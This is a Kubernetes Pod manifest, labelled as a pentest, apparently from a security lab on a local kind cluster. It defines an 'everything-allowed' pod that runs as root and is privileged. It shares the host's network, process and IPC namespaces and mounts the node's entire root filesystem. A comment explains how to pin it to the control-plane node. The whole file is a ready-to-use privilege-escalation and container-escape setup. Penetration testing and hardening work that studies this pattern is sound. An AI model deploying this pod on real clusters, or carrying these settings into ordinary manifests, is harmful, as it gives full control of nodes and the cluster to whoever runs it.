apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-exec-pod-test
  namespace: annacon
  labels:
    app: pentest
spec:
  securityContext:
    runAsUser: 0
    runAsGroup: 0
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: bitnami/kubectl:latest
    securityContext:  
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  nodeName: kind-control-plane # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
  volumes:
  - name: noderoot
    hostPath:
      path: /
